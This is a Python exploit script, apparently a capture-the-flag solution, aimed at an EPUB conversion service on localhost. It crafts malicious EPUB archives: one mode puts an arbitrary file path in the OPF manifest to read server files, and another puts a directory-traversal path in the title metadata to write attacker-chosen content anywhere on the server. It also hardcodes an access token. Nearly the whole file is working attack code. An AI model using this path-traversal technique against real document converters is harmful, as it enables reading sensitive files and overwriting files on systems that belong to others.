tasks/books/exploit.py

import io
import requests
import sys
import zipfile


TOKEN = "jhnp57tb17nsrdv5"

cmd = sys.argv[1]


if cmd == "reset":
    requests.post(f"http://127.0.0.1:12345/__internal__/reboot_container/{TOKEN}")
    sys.exit(0)


raw_zip_file = io.BytesIO()
with zipfile.ZipFile(raw_zip_file, "w") as zf:
    zf.writestr("mimetype", "application/epub+zip")
    zf.writestr("META-INF/container.xml", """<?xml version="1.0"?>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
    <rootfile full-path="content.opf" media-type="application/oebps-package+xml"/>
</rootfiles>
</container>""")

    if cmd == "cat":
        path = sys.argv[2]
        zf.writestr("content.opf", f"""<?xml version='1.0' encoding='utf-8'?>
<package xmlns="http://www.idpf.org/2007/opf" version="2.0" unique-identifier="uuid_id">
    <metadata xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:opf="http://www.idpf.org/2007/opf" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:calibre="http://calibre.kovidgoyal.net/2009/metadata" xmlns:dc="http://purl.org/dc/elements/1.1/">
        <dc:title>Meow</dc:title>
    </metadata>
    <manifest>
        <item href="{path}" id="file" media-type="application/xhtml+xml"/>
    </manifest>
    <spine toc="ncx">
        <itemref idref="file"/>
    </spine>
</package>""")
    elif cmd == "write":
        path = sys.argv[2]
        content = sys.argv[3]
        zf.writestr("content.opf", f"""<?xml version='1.0' encoding='utf-8'?>
<package xmlns="http://www.idpf.org/2007/opf" version="2.0" unique-identifier="uuid_id">
    <metadata xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:opf="http://www.idpf.org/2007/opf" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:calibre="http://calibre.kovidgoyal.net/2009/metadata" xmlns:dc="http://purl.org/dc/elements/1.1/">
        <dc:title>../..{path.rjust(80, '/')}</dc:title>
    </metadata>
    <manifest>
        <item href="file" id="file" media-type="application/xhtml+xml"/>
    </manifest>
    <spine toc="ncx">
        <itemref idref="file"/>
    </spine>
</package>""")
        zf.writestr("file", content)

raw_zip_file.seek(0)

text = requests.post(f"http://127.0.0.1:12345/{TOKEN}/convert", files={"source": raw_zip_file}).text

if cmd == "cat":
    url = text.split("href=\"")[1].split("\"")[0]

    md = requests.get(f"http://127.0.0.1:12345/{TOKEN}/{url}").text
    print(md.rsplit("\n\n---")[0], end="")
elif cmd == "write":
    pass
elif cmd == "log":
    print(text.partition("<pre>")[2].partition("</pre>")[0], end="")